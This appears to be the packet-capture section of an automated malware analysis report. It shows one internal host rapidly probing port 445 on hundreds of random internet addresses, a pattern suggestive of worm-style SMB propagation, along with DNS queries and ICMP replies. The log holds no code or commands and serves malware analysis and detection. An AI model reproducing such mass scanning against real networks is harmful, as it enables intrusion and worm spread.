May 8, 2023 05:37:37.016956091 CEST	52965	445	192.168.2.6	149.180.233.129
May 8, 2023 05:37:37.122035027 CEST	52966	445	192.168.2.6	218.102.63.246
May 8, 2023 05:37:37.122737885 CEST	52967	445	192.168.2.6	141.72.227.114
May 8, 2023 05:37:37.123488903 CEST	52968	445	192.168.2.6	210.162.149.219
May 8, 2023 05:37:37.123985052 CEST	52969	445	192.168.2.6	202.58.31.60
May 8, 2023 05:37:37.124613047 CEST	52970	445	192.168.2.6	195.71.134.71
May 8, 2023 05:37:37.125180006 CEST	52971	445	192.168.2.6	42.21.207.46
May 8, 2023 05:37:37.125915051 CEST	52972	445	192.168.2.6	58.129.129.181
May 8, 2023 05:37:37.148511887 CEST	445	52954	67.205.17.184	192.168.2.6
May 8, 2023 05:37:37.496537924 CEST	52976	445	192.168.2.6	107.165.99.78
May 8, 2023 05:37:37.652559042 CEST	52954	445	192.168.2.6	67.205.17.184
May 8, 2023 05:37:37.786331892 CEST	445	52954	67.205.17.184	192.168.2.6
May 8, 2023 05:37:37.996962070 CEST	52980	445	192.168.2.6	73.215.33.164
May 8, 2023 05:37:37.997075081 CEST	52981	445	192.168.2.6	106.117.7.220
May 8, 2023 05:37:37.997196913 CEST	52982	445	192.168.2.6	50.108.58.125
May 8, 2023 05:37:37.997286081 CEST	52983	445	192.168.2.6	186.163.0.0
May 8, 2023 05:37:37.997476101 CEST	52984	445	192.168.2.6	145.206.170.188
May 8, 2023 05:37:38.143158913 CEST	52999	445	192.168.2.6	153.90.109.248
May 8, 2023 05:37:38.143474102 CEST	53002	445	192.168.2.6	174.209.145.202
May 8, 2023 05:37:38.143577099 CEST	53003	445	192.168.2.6	48.41.127.84
May 8, 2023 05:37:38.143661022 CEST	53004	445	192.168.2.6	129.111.21.247
May 8, 2023 05:37:38.143862963 CEST	53005	445	192.168.2.6	125.90.251.139
May 8, 2023 05:37:38.143908978 CEST	53006	445	192.168.2.6	211.201.36.202
May 8, 2023 05:37:38.144016981 CEST	53007	445	192.168.2.6	73.189.236.60
May 8, 2023 05:37:38.144227982 CEST	53009	445	192.168.2.6	197.178.68.141
May 8, 2023 05:37:38.144289970 CEST	53010	445	192.168.2.6	129.229.218.110
May 8, 2023 05:37:38.144377947 CEST	53011	445	192.168.2.6	121.103.82.238
May 8, 2023 05:37:38.144565105 CEST	53013	445	192.168.2.6	169.122.76.16
May 8, 2023 05:37:38.144752026 CEST	53015	445	192.168.2.6	7.116.35.156
May 8, 2023 05:37:38.144908905 CEST	53017	445	192.168.2.6	13.241.133.24
May 8, 2023 05:37:38.145016909 CEST	53018	445	192.168.2.6	104.23.8.55
May 8, 2023 05:37:38.145057917 CEST	53019	445	192.168.2.6	56.84.85.39
May 8, 2023 05:37:38.145183086 CEST	53020	445	192.168.2.6	112.100.192.246
May 8, 2023 05:37:38.145275116 CEST	53021	445	192.168.2.6	49.155.95.77
May 8, 2023 05:37:38.145416021 CEST	53022	445	192.168.2.6	9.29.11.16
May 8, 2023 05:37:38.230648041 CEST	52534	445	192.168.2.6	137.132.36.25
May 8, 2023 05:37:38.231286049 CEST	53023	445	192.168.2.6	165.230.140.112
May 8, 2023 05:37:38.231754065 CEST	53024	445	192.168.2.6	130.72.181.44
May 8, 2023 05:37:38.232398033 CEST	53025	445	192.168.2.6	41.69.115.211
May 8, 2023 05:37:38.232827902 CEST	53026	445	192.168.2.6	113.11.49.10
May 8, 2023 05:37:38.233510971 CEST	53027	445	192.168.2.6	136.163.102.211
May 8, 2023 05:37:38.233943939 CEST	53028	445	192.168.2.6	114.102.120.107
May 8, 2023 05:37:38.234740019 CEST	53029	445	192.168.2.6	169.30.162.178
May 8, 2023 05:37:38.561764002 CEST	53034	445	192.168.2.6	107.165.99.79
May 8, 2023 05:37:38.668931007 CEST	52584	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:39.012037039 CEST	52586	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:39.329488993 CEST	53038	445	192.168.2.6	221.205.208.116
May 8, 2023 05:37:39.329663038 CEST	53039	445	192.168.2.6	104.33.77.84
May 8, 2023 05:37:39.329947948 CEST	53040	445	192.168.2.6	84.202.174.116
May 8, 2023 05:37:39.330297947 CEST	53041	445	192.168.2.6	97.229.240.235
May 8, 2023 05:37:39.330615044 CEST	53043	445	192.168.2.6	181.227.47.125
May 8, 2023 05:37:39.330837965 CEST	53044	445	192.168.2.6	154.221.114.108
May 8, 2023 05:37:39.331209898 CEST	53045	445	192.168.2.6	74.169.185.114
May 8, 2023 05:37:39.331276894 CEST	53046	445	192.168.2.6	98.239.32.164
May 8, 2023 05:37:39.331537008 CEST	53047	445	192.168.2.6	216.154.253.235
May 8, 2023 05:37:39.331892014 CEST	53050	445	192.168.2.6	103.19.48.1
May 8, 2023 05:37:39.332252026 CEST	53052	445	192.168.2.6	194.2.189.37
May 8, 2023 05:37:39.332448006 CEST	53053	445	192.168.2.6	5.133.141.123
May 8, 2023 05:37:39.332695961 CEST	53054	445	192.168.2.6	5.186.212.108
May 8, 2023 05:37:39.332818985 CEST	53055	445	192.168.2.6	109.94.8.6
May 8, 2023 05:37:39.333077908 CEST	53056	445	192.168.2.6	218.213.250.127
May 8, 2023 05:37:39.333210945 CEST	53057	445	192.168.2.6	185.154.224.182
May 8, 2023 05:37:39.333655119 CEST	53059	445	192.168.2.6	50.105.15.154
May 8, 2023 05:37:39.333806992 CEST	53060	445	192.168.2.6	121.107.9.0
May 8, 2023 05:37:39.334151983 CEST	53061	445	192.168.2.6	153.154.136.189
May 8, 2023 05:37:39.334290028 CEST	53062	445	192.168.2.6	129.112.132.160
May 8, 2023 05:37:39.334619045 CEST	53063	445	192.168.2.6	89.38.99.212
May 8, 2023 05:37:39.335784912 CEST	53078	445	192.168.2.6	217.253.131.216
May 8, 2023 05:37:39.336213112 CEST	53080	445	192.168.2.6	210.214.173.180
May 8, 2023 05:37:39.361902952 CEST	445	53063	89.38.99.212	192.168.2.6
May 8, 2023 05:37:39.378113985 CEST	53081	445	192.168.2.6	207.48.10.48
May 8, 2023 05:37:39.378801107 CEST	53082	445	192.168.2.6	134.5.1.41
May 8, 2023 05:37:39.379570007 CEST	53083	445	192.168.2.6	167.119.164.0
May 8, 2023 05:37:39.380047083 CEST	53084	445	192.168.2.6	158.14.42.211
May 8, 2023 05:37:39.380764961 CEST	53085	445	192.168.2.6	209.177.1.165
May 8, 2023 05:37:39.381167889 CEST	53086	445	192.168.2.6	27.27.234.90
May 8, 2023 05:37:39.381860971 CEST	53087	445	192.168.2.6	53.210.176.185
May 8, 2023 05:37:39.660001040 CEST	53091	445	192.168.2.6	107.165.99.80
May 8, 2023 05:37:39.871534109 CEST	53063	445	192.168.2.6	89.38.99.212
May 8, 2023 05:37:39.899374962 CEST	445	53063	89.38.99.212	192.168.2.6
May 8, 2023 05:37:40.564917088 CEST	53097	445	192.168.2.6	104.190.52.39
May 8, 2023 05:37:40.566812038 CEST	53098	445	192.168.2.6	169.73.56.134
May 8, 2023 05:37:40.568773985 CEST	53099	445	192.168.2.6	180.17.113.6
May 8, 2023 05:37:40.570276976 CEST	53100	445	192.168.2.6	61.134.208.140
May 8, 2023 05:37:40.571790934 CEST	53101	445	192.168.2.6	79.219.222.55
May 8, 2023 05:37:40.573590040 CEST	53102	445	192.168.2.6	134.130.219.101
May 8, 2023 05:37:40.638798952 CEST	53103	445	192.168.2.6	212.6.189.110
May 8, 2023 05:37:40.639750004 CEST	53104	445	192.168.2.6	114.141.83.34
May 8, 2023 05:37:40.640041113 CEST	53106	445	192.168.2.6	27.115.127.170
May 8, 2023 05:37:40.644377947 CEST	53121	445	192.168.2.6	175.103.30.37
May 8, 2023 05:37:40.644545078 CEST	53122	445	192.168.2.6	100.150.188.89
May 8, 2023 05:37:40.645138025 CEST	53123	445	192.168.2.6	185.231.61.209
May 8, 2023 05:37:40.645376921 CEST	53124	445	192.168.2.6	90.81.25.139
May 8, 2023 05:37:40.645513058 CEST	53125	445	192.168.2.6	81.144.33.205
May 8, 2023 05:37:40.646358967 CEST	53127	445	192.168.2.6	55.102.149.27
May 8, 2023 05:37:40.646502018 CEST	53128	445	192.168.2.6	209.170.201.250
May 8, 2023 05:37:40.646683931 CEST	53129	445	192.168.2.6	114.244.144.138
May 8, 2023 05:37:40.646763086 CEST	53130	445	192.168.2.6	8.227.163.150
May 8, 2023 05:37:40.646893024 CEST	53131	445	192.168.2.6	50.173.212.131
May 8, 2023 05:37:40.647031069 CEST	53132	445	192.168.2.6	31.134.137.155
May 8, 2023 05:37:40.648611069 CEST	53134	445	192.168.2.6	14.144.18.52
May 8, 2023 05:37:40.649203062 CEST	53137	445	192.168.2.6	28.118.203.250
May 8, 2023 05:37:40.649296045 CEST	53138	445	192.168.2.6	140.60.194.157
May 8, 2023 05:37:40.649408102 CEST	53139	445	192.168.2.6	11.29.111.201
May 8, 2023 05:37:40.649516106 CEST	53140	445	192.168.2.6	106.95.224.248
May 8, 2023 05:37:40.660857916 CEST	53141	445	192.168.2.6	1.140.223.236
May 8, 2023 05:37:40.737730980 CEST	445	53061	153.154.136.189	192.168.2.6
May 8, 2023 05:37:40.772742033 CEST	53143	445	192.168.2.6	184.13.7.92
May 8, 2023 05:37:40.773866892 CEST	53144	445	192.168.2.6	101.24.46.201
May 8, 2023 05:37:40.774888039 CEST	53145	445	192.168.2.6	102.26.156.141
May 8, 2023 05:37:40.777540922 CEST	53146	445	192.168.2.6	142.120.9.111
May 8, 2023 05:37:40.857584000 CEST	53150	445	192.168.2.6	107.165.99.81
May 8, 2023 05:37:41.182243109 CEST	445	53145	102.26.156.141	192.168.2.6
May 8, 2023 05:37:41.684184074 CEST	53145	445	192.168.2.6	102.26.156.141
May 8, 2023 05:37:41.792695999 CEST	445	53145	102.26.156.141	192.168.2.6
May 8, 2023 05:37:42.228200912 CEST	53154	445	192.168.2.6	107.165.99.82
May 8, 2023 05:37:42.300370932 CEST	53162	445	192.168.2.6	191.99.240.176
May 8, 2023 05:37:42.301451921 CEST	53163	445	192.168.2.6	221.192.125.84
May 8, 2023 05:37:42.302063942 CEST	53164	445	192.168.2.6	95.149.48.157
May 8, 2023 05:37:42.302573919 CEST	53165	445	192.168.2.6	216.179.207.37
May 8, 2023 05:37:42.302928925 CEST	53166	445	192.168.2.6	65.199.130.179
May 8, 2023 05:37:42.304043055 CEST	53167	445	192.168.2.6	142.87.130.134
May 8, 2023 05:37:42.304667950 CEST	53168	445	192.168.2.6	66.154.56.101
May 8, 2023 05:37:42.305358887 CEST	53170	445	192.168.2.6	104.0.9.232
May 8, 2023 05:37:42.309058905 CEST	53185	445	192.168.2.6	193.105.103.2
May 8, 2023 05:37:42.309571981 CEST	53186	445	192.168.2.6	141.96.228.165
May 8, 2023 05:37:42.309753895 CEST	53187	445	192.168.2.6	125.63.164.223
May 8, 2023 05:37:42.309926033 CEST	53188	445	192.168.2.6	187.83.225.200
May 8, 2023 05:37:42.310050964 CEST	53189	445	192.168.2.6	129.160.172.117
May 8, 2023 05:37:42.310394049 CEST	53191	445	192.168.2.6	64.251.205.36
May 8, 2023 05:37:42.310543060 CEST	53192	445	192.168.2.6	71.56.230.138
May 8, 2023 05:37:42.310698986 CEST	53193	445	192.168.2.6	55.30.34.211
May 8, 2023 05:37:42.310847044 CEST	53194	445	192.168.2.6	63.214.78.184
May 8, 2023 05:37:42.311006069 CEST	53195	445	192.168.2.6	8.103.249.124
May 8, 2023 05:37:42.311141014 CEST	53196	445	192.168.2.6	211.246.103.170
May 8, 2023 05:37:42.311430931 CEST	53198	445	192.168.2.6	29.180.89.203
May 8, 2023 05:37:42.311825037 CEST	53201	445	192.168.2.6	207.15.26.17
May 8, 2023 05:37:42.311935902 CEST	53202	445	192.168.2.6	90.209.110.147
May 8, 2023 05:37:42.312099934 CEST	53203	445	192.168.2.6	50.102.155.48
May 8, 2023 05:37:42.312299013 CEST	53204	445	192.168.2.6	40.54.157.154
May 8, 2023 05:37:42.312922001 CEST	53205	445	192.168.2.6	80.156.167.54
May 8, 2023 05:37:42.313577890 CEST	53206	445	192.168.2.6	155.11.78.220
May 8, 2023 05:37:42.314199924 CEST	53207	445	192.168.2.6	139.219.243.236
May 8, 2023 05:37:42.314822912 CEST	53208	445	192.168.2.6	24.227.142.240
May 8, 2023 05:37:42.315442085 CEST	53209	445	192.168.2.6	221.76.211.99
May 8, 2023 05:37:42.315988064 CEST	53210	445	192.168.2.6	3.242.209.128
May 8, 2023 05:37:45.309416056 CEST	53191	445	192.168.2.6	64.251.205.36
May 8, 2023 05:37:45.309423923 CEST	53170	445	192.168.2.6	104.0.9.232
May 8, 2023 05:37:45.309425116 CEST	53186	445	192.168.2.6	141.96.228.165
May 8, 2023 05:37:45.309498072 CEST	53168	445	192.168.2.6	66.154.56.101
May 8, 2023 05:37:45.309523106 CEST	53209	445	192.168.2.6	221.76.211.99
May 8, 2023 05:37:45.309525967 CEST	53207	445	192.168.2.6	139.219.243.236
May 8, 2023 05:37:45.309525013 CEST	53195	445	192.168.2.6	8.103.249.124
May 8, 2023 05:37:45.309525013 CEST	53189	445	192.168.2.6	129.160.172.117
May 8, 2023 05:37:45.309525967 CEST	53206	445	192.168.2.6	155.11.78.220
May 8, 2023 05:37:45.309530020 CEST	53194	445	192.168.2.6	63.214.78.184
May 8, 2023 05:37:45.309530020 CEST	53185	445	192.168.2.6	193.105.103.2
May 8, 2023 05:37:45.309530020 CEST	53196	445	192.168.2.6	211.246.103.170
May 8, 2023 05:37:45.309530020 CEST	53210	445	192.168.2.6	3.242.209.128
May 8, 2023 05:37:45.309539080 CEST	53204	445	192.168.2.6	40.54.157.154
May 8, 2023 05:37:45.309539080 CEST	53162	445	192.168.2.6	191.99.240.176
May 8, 2023 05:37:45.309539080 CEST	53166	445	192.168.2.6	65.199.130.179
May 8, 2023 05:37:45.309587955 CEST	53203	445	192.168.2.6	50.102.155.48
May 8, 2023 05:37:45.309587955 CEST	53205	445	192.168.2.6	80.156.167.54
May 8, 2023 05:37:45.371937037 CEST	53187	445	192.168.2.6	125.63.164.223
May 8, 2023 05:37:45.371947050 CEST	53165	445	192.168.2.6	216.179.207.37
May 8, 2023 05:37:45.371985912 CEST	53192	445	192.168.2.6	71.56.230.138
May 8, 2023 05:37:45.371985912 CEST	53154	445	192.168.2.6	107.165.99.82
May 8, 2023 05:37:45.372003078 CEST	53198	445	192.168.2.6	29.180.89.203
May 8, 2023 05:37:45.372003078 CEST	53208	445	192.168.2.6	24.227.142.240
May 8, 2023 05:37:45.372003078 CEST	53167	445	192.168.2.6	142.87.130.134
May 8, 2023 05:37:45.372020960 CEST	53188	445	192.168.2.6	187.83.225.200
May 8, 2023 05:37:45.372020960 CEST	53164	445	192.168.2.6	95.149.48.157
May 8, 2023 05:37:45.372034073 CEST	53163	445	192.168.2.6	221.192.125.84
May 8, 2023 05:37:45.372256041 CEST	53201	445	192.168.2.6	207.15.26.17
May 8, 2023 05:37:45.372519016 CEST	53193	445	192.168.2.6	55.30.34.211
May 8, 2023 05:37:45.372519016 CEST	53202	445	192.168.2.6	90.209.110.147
May 8, 2023 05:37:45.921330929 CEST	53214	445	192.168.2.6	107.165.99.83
May 8, 2023 05:37:45.971364975 CEST	53237	445	192.168.2.6	43.137.145.24
May 8, 2023 05:37:45.971491098 CEST	53238	445	192.168.2.6	148.175.128.112
May 8, 2023 05:37:45.971659899 CEST	53239	445	192.168.2.6	8.247.215.55
May 8, 2023 05:37:45.971749067 CEST	53240	445	192.168.2.6	118.156.73.35
May 8, 2023 05:37:45.971904993 CEST	53241	445	192.168.2.6	18.78.88.248
May 8, 2023 05:37:45.971993923 CEST	53242	445	192.168.2.6	196.94.217.128
May 8, 2023 05:37:45.972105026 CEST	53243	445	192.168.2.6	68.189.100.189
May 8, 2023 05:37:45.972214937 CEST	53244	445	192.168.2.6	87.95.91.57
May 8, 2023 05:37:45.972351074 CEST	53245	445	192.168.2.6	51.189.12.157
May 8, 2023 05:37:45.972491026 CEST	53246	445	192.168.2.6	149.70.242.137
May 8, 2023 05:37:45.972657919 CEST	53247	445	192.168.2.6	165.145.159.152
May 8, 2023 05:37:45.972743034 CEST	53248	445	192.168.2.6	191.141.73.215
May 8, 2023 05:37:45.972857952 CEST	53249	445	192.168.2.6	91.64.94.57
May 8, 2023 05:37:45.972980976 CEST	53250	445	192.168.2.6	177.11.106.33
May 8, 2023 05:37:45.973107100 CEST	53251	445	192.168.2.6	34.141.136.70
May 8, 2023 05:37:45.973198891 CEST	53252	445	192.168.2.6	64.136.82.169
May 8, 2023 05:37:45.973324060 CEST	53253	445	192.168.2.6	107.229.67.115
May 8, 2023 05:37:45.973421097 CEST	53254	445	192.168.2.6	62.236.57.19
May 8, 2023 05:37:45.973536015 CEST	53255	445	192.168.2.6	3.116.128.16
May 8, 2023 05:37:45.973628998 CEST	53256	445	192.168.2.6	77.38.254.48
May 8, 2023 05:37:45.973742008 CEST	53257	445	192.168.2.6	191.121.208.83
May 8, 2023 05:37:45.973855019 CEST	53258	445	192.168.2.6	198.171.39.128
May 8, 2023 05:37:45.973952055 CEST	53259	445	192.168.2.6	34.180.164.225
May 8, 2023 05:37:45.974041939 CEST	53260	445	192.168.2.6	60.58.73.5
May 8, 2023 05:37:45.974167109 CEST	53261	445	192.168.2.6	148.159.85.53
May 8, 2023 05:37:45.974256992 CEST	53262	445	192.168.2.6	184.202.142.208
May 8, 2023 05:37:45.974373102 CEST	53263	445	192.168.2.6	85.235.17.163
May 8, 2023 05:37:45.974473000 CEST	53264	445	192.168.2.6	220.218.39.211
May 8, 2023 05:37:45.974589109 CEST	53265	445	192.168.2.6	126.6.229.114
May 8, 2023 05:37:45.974685907 CEST	53266	445	192.168.2.6	222.186.194.56
May 8, 2023 05:37:46.901459932 CEST	445	53257	191.121.208.83	192.168.2.6
May 8, 2023 05:37:46.982862949 CEST	53274	445	192.168.2.6	107.165.99.84
May 8, 2023 05:37:47.092221022 CEST	53297	445	192.168.2.6	98.141.18.219
May 8, 2023 05:37:47.092258930 CEST	53298	445	192.168.2.6	106.146.69.115
May 8, 2023 05:37:47.092427015 CEST	53300	445	192.168.2.6	32.190.76.248
May 8, 2023 05:37:47.092458010 CEST	53301	445	192.168.2.6	177.102.4.186
May 8, 2023 05:37:47.092545986 CEST	53299	445	192.168.2.6	41.58.178.121
May 8, 2023 05:37:47.092550039 CEST	53302	445	192.168.2.6	84.101.1.66
May 8, 2023 05:37:47.092561007 CEST	53303	445	192.168.2.6	10.220.143.141
May 8, 2023 05:37:47.092674017 CEST	53304	445	192.168.2.6	208.203.75.158
May 8, 2023 05:37:47.092708111 CEST	53305	445	192.168.2.6	84.162.87.184
May 8, 2023 05:37:47.092801094 CEST	53306	445	192.168.2.6	130.43.157.50
May 8, 2023 05:37:47.092895985 CEST	53308	445	192.168.2.6	44.47.196.196
May 8, 2023 05:37:47.092936993 CEST	53309	445	192.168.2.6	194.142.210.45
May 8, 2023 05:37:47.092958927 CEST	53307	445	192.168.2.6	161.215.214.65
May 8, 2023 05:37:47.093010902 CEST	53310	445	192.168.2.6	97.203.137.33
May 8, 2023 05:37:47.093091965 CEST	53312	445	192.168.2.6	94.152.196.183
May 8, 2023 05:37:47.093135118 CEST	53313	445	192.168.2.6	37.33.69.79
May 8, 2023 05:37:47.093204021 CEST	53314	445	192.168.2.6	30.46.83.126
May 8, 2023 05:37:47.093296051 CEST	53315	445	192.168.2.6	80.219.212.189
May 8, 2023 05:37:47.093306065 CEST	53316	445	192.168.2.6	5.55.60.99
May 8, 2023 05:37:47.093483925 CEST	53317	445	192.168.2.6	133.247.91.247
May 8, 2023 05:37:47.093614101 CEST	53320	445	192.168.2.6	90.94.80.82
May 8, 2023 05:37:47.093683004 CEST	53318	445	192.168.2.6	202.130.75.131
May 8, 2023 05:37:47.093683958 CEST	53319	445	192.168.2.6	208.121.92.157
May 8, 2023 05:37:47.093703985 CEST	53321	445	192.168.2.6	13.121.10.134
May 8, 2023 05:37:47.093744040 CEST	53322	445	192.168.2.6	89.118.189.173
May 8, 2023 05:37:47.093812943 CEST	53323	445	192.168.2.6	210.233.173.194
May 8, 2023 05:37:47.093857050 CEST	53324	445	192.168.2.6	218.88.100.220
May 8, 2023 05:37:47.093935966 CEST	53325	445	192.168.2.6	190.229.110.83
May 8, 2023 05:37:47.093967915 CEST	53326	445	192.168.2.6	22.170.55.156
May 8, 2023 05:37:47.184571981 CEST	52534	445	192.168.2.6	137.132.36.25
May 8, 2023 05:37:47.887772083 CEST	52584	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:48.340919018 CEST	52586	445	192.168.2.6	137.132.36.1
May 8, 2023 05:37:49.981755018 CEST	53274	445	192.168.2.6	107.165.99.84
May 8, 2023 05:37:50.091051102 CEST	53298	445	192.168.2.6	106.146.69.115
May 8, 2023 05:37:50.091079950 CEST	53300	445	192.168.2.6	32.190.76.248
May 8, 2023 05:37:50.091082096 CEST	53321	445	192.168.2.6	13.121.10.134
May 8, 2023 05:37:50.091082096 CEST	53302	445	192.168.2.6	84.101.1.66
May 8, 2023 05:37:50.092516899 CEST	53307	445	192.168.2.6	161.215.214.65
May 8, 2023 05:37:50.092516899 CEST	53315	445	192.168.2.6	80.219.212.189
May 8, 2023 05:37:50.093786955 CEST	53319	445	192.168.2.6	208.121.92.157
May 8, 2023 05:37:50.106698036 CEST	53304	445	192.168.2.6	208.203.75.158
May 8, 2023 05:37:50.106714964 CEST	53317	445	192.168.2.6	133.247.91.247
May 8, 2023 05:37:50.106722116 CEST	53305	445	192.168.2.6	84.162.87.184
May 8, 2023 05:37:50.106723070 CEST	53301	445	192.168.2.6	177.102.4.186
May 8, 2023 05:37:50.106723070 CEST	53306	445	192.168.2.6	130.43.157.50
May 8, 2023 05:37:50.106743097 CEST	53320	445	192.168.2.6	90.94.80.82
May 8, 2023 05:37:50.106744051 CEST	53322	445	192.168.2.6	89.118.189.173
May 8, 2023 05:37:50.106761932 CEST	53310	445	192.168.2.6	97.203.137.33
May 8, 2023 05:37:50.106767893 CEST	53297	445	192.168.2.6	98.141.18.219
May 8, 2023 05:37:50.106767893 CEST	53324	445	192.168.2.6	218.88.100.220
May 8, 2023 05:37:50.106770992 CEST	53303	445	192.168.2.6	10.220.143.141
May 8, 2023 05:37:50.106770992 CEST	53325	445	192.168.2.6	190.229.110.83
May 8, 2023 05:37:50.106770992 CEST	53326	445	192.168.2.6	22.170.55.156
May 8, 2023 05:37:50.106770992 CEST	53323	445	192.168.2.6	210.233.173.194
May 8, 2023 05:37:50.106775999 CEST	53309	445	192.168.2.6	194.142.210.45
May 8, 2023 05:37:50.106775999 CEST	53313	445	192.168.2.6	37.33.69.79
May 8, 2023 05:37:50.106775999 CEST	53308	445	192.168.2.6	44.47.196.196
May 8, 2023 05:37:50.106775999 CEST	53314	445	192.168.2.6	30.46.83.126
May 8, 2023 05:37:50.106775999 CEST	53316	445	192.168.2.6	5.55.60.99
May 8, 2023 05:37:50.108485937 CEST	53299	445	192.168.2.6	41.58.178.121
May 8, 2023 05:37:50.108485937 CEST	53318	445	192.168.2.6	202.130.75.131
May 8, 2023 05:37:50.108500957 CEST	53312	445	192.168.2.6	94.152.196.183

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 8, 2023 05:35:38.893922091 CEST	59575	53	192.168.2.6	8.8.8.8
May 8, 2023 05:35:38.928792953 CEST	53	59575	8.8.8.8	192.168.2.6
May 8, 2023 05:35:39.859180927 CEST	49786	53	192.168.2.6	8.8.8.8
May 8, 2023 05:35:39.885539055 CEST	53	49786	8.8.8.8	192.168.2.6
May 8, 2023 05:36:22.378782034 CEST	138	138	192.168.2.6	192.168.2.255

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 8, 2023 05:35:50.616421938 CEST	38.140.156.98	192.168.2.6	7d30	(Unknown)	Destination Unreachable
May 8, 2023 05:35:54.886532068 CEST	217.246.253.154	192.168.2.6	d16c	(Unknown)	Destination Unreachable
May 8, 2023 05:36:01.887576103 CEST	186.108.26.254	192.168.2.6	71f3	(Time to live exceeded in transit)	Time Exceeded
May 8, 2023 05:36:09.238343954 CEST	68.175.2.246	192.168.2.6	76d	(Unknown)	Destination Unreachable
May 8, 2023 05:36:09.464803934 CEST	96.1.215.3	192.168.2.6	bd92	(Host unreachable)	Destination Unreachable
May 8, 2023 05:36:12.087182999 CEST	105.187.232.129	192.168.2.6	4827	(Time to live exceeded in transit)	Time Exceeded
May 8, 2023 05:36:17.490365982 CEST	89.75.24.201	192.168.2.6	dfbc	(Unknown)	Destination Unreachable
May 8, 2023 05:36:19.832329988 CEST	92.119.92.187	192.168.2.6	9fac	(Unknown)	Destination Unreachable
May 8, 2023 05:36:20.864923954 CEST	92.66.219.153	192.168.2.6	f7b2	(Host unreachable)	Destination Unreachable
May 8, 2023 05:36:24.478492022 CEST	84.176.222.96	192.168.2.6	242e	(Unknown)	Destination Unreachable
May 8, 2023 05:36:28.312347889 CEST	94.177.158.230	192.168.2.6	4e95	(Host unreachable)	Destination Unreachable
May 8, 2023 05:36:29.003174067 CEST	209.66.125.170	192.168.2.6	4b13	(Net unreachable)	Destination Unreachable
May 8, 2023 05:36:30.362375021 CEST	88.67.240.145	192.168.2.6	f5ab	(Unknown)	Destination Unreachable
May 8, 2023 05:36:30.375884056 CEST	91.65.107.142	192.168.2.6	c62f	(Unknown)	Destination Unreachable
May 8, 2023 05:36:35.104742050 CEST	103.178.176.198	192.168.2.6	bbec	(Host unreachable)	Destination Unreachable
May 8, 2023 05:36:40.532717943 CEST	105.27.206.26	192.168.2.6	67ac	(Host unreachable)	Destination Unreachable
May 8, 2023 05:36:45.466254950 CEST	47.200.215.122	192.168.2.6	c70a	(Unknown)	Destination Unreachable
May 8, 2023 05:36:45.572299957 CEST	45.122.229.86	192.168.2.6	2cc1	(Net unreachable)	Destination Unreachable
May 8, 2023 05:36:46.305155993 CEST	79.239.54.192	192.168.2.6	6389	(Unknown)	Destination Unreachable
May 8, 2023 05:36:46.317624092 CEST	38.32.96.202	192.168.2.6	e6b8	(Net unreachable)	Destination Unreachable
May 8, 2023 05:36:46.754967928 CEST	162.144.240.75	192.168.2.6	c1e3	(Host unreachable)	Destination Unreachable
May 8, 2023 05:36:46.898929119 CEST	4.14.234.250	192.168.2.6	3b9b	(Time to live exceeded in transit)	Time Exceeded
May 8, 2023 05:36:49.218168974 CEST	179.108.117.214	192.168.2.6	773f	(Time to live exceeded in transit)	Time Exceeded
May 8, 2023 05:36:49.614840984 CEST	140.227.218.242	192.168.2.6	2bec	(Host unreachable)	Destination Unreachable
May 8, 2023 05:36:53.327135086 CEST	46.5.58.40	192.168.2.6	9280	(Unknown)	Destination Unreachable
May 8, 2023 05:36:53.443690062 CEST	47.204.103.2	192.168.2.6	5696	(Unknown)	Destination Unreachable
May 8, 2023 05:36:53.630304098 CEST	43.232.241.1	192.168.2.6	dda3	(Host unreachable)	Destination Unreachable
May 8, 2023 05:36:54.540024042 CEST	69.18.32.6	192.168.2.6	d9d1	(Unknown)	Destination Unreachable
May 8, 2023 05:36:58.077032089 CEST	213.221.239.159	192.168.2.6	a93c	(Host unreachable)	Destination Unreachable
May 8, 2023 05:37:00.034257889 CEST	93.227.15.210	192.168.2.6	54ae	(Unknown)	Destination Unreachable
May 8, 2023 05:37:11.440958977 CEST	109.234.22.39	192.168.2.6	43e3	(Port unreachable)	Destination Unreachable
May 8, 2023 05:37:12.658885002 CEST	193.138.178.5	192.168.2.6	69bc	(Time to live exceeded in transit)	Time Exceeded
May 8, 2023 05:37:13.612190962 CEST	170.250.167.14	192.168.2.6	11d1	(Unknown)	Destination Unreachable
May 8, 2023 05:37:15.848834991 CEST	162.34.238.2	192.168.2.6	6cbb	(Time to live exceeded in transit)	Time Exceeded
May 8, 2023 05:37:17.059194088 CEST	46.15.52.107	192.168.2.6	da5	(Port unreachable)	Destination Unreachable
May 8, 2023 05:37:17.080786943 CEST	103.11.5.25	192.168.2.6	2bef	(Unknown)	Destination Unreachable
May 8, 2023 05:37:18.515336990 CEST	186.177.66.26	192.168.2.6	a032	(Time to live exceeded in transit)	Time Exceeded
May 8, 2023 05:37:19.922708988 CEST	180.217.26.92	192.168.2.6	f450	(Port unreachable)	Destination Unreachable
May 8, 2023 05:37:23.639622927 CEST	217.29.66.150	192.168.2.6	1d29	(Unknown)	Destination Unreachable
May 8, 2023 05:37:27.132967949 CEST	69.156.254.134	192.168.2.6	971b	(Time to live exceeded in transit)	Time Exceeded
May 8, 2023 05:37:31.345314026 CEST	94.217.117.56	192.168.2.6	6fa1	(Unknown)	Destination Unreachable
May 8, 2023 05:37:33.895522118 CEST	205.134.10.45	192.168.2.6	97db	(Net unreachable)	Destination Unreachable
May 8, 2023 05:37:34.814934015 CEST	92.75.252.27	192.168.2.6	ae0e	(Unknown)	Destination Unreachable
May 8, 2023 05:37:37.050246954 CEST	91.43.83.114	192.168.2.6	f4ea	(Unknown)	Destination Unreachable
May 8, 2023 05:37:37.313261986 CEST	218.102.39.225	192.168.2.6	2abb	(Unknown)	Destination Unreachable
May 8, 2023 05:37:39.509469986 CEST	210.214.225.225	192.168.2.6	5e4f	(Time to live exceeded in transit)	Time Exceeded
May 8, 2023 05:37:40.373326063 CEST	115.186.148.250	192.168.2.6	56e8	(Host unreachable)	Destination Unreachable
May 8, 2023 05:37:42.425118923 CEST	24.142.57.66	192.168.2.6	d0b2	(Net unreachable)	Destination Unreachable
May 8, 2023 05:37:45.493221998 CEST	24.142.57.66	192.168.2.6	d0b2	(Net unreachable)	Destination Unreachable
May 8, 2023 05:37:46.008178949 CEST	91.64.94.57	192.168.2.6	25f8	(Unknown)	Destination Unreachable
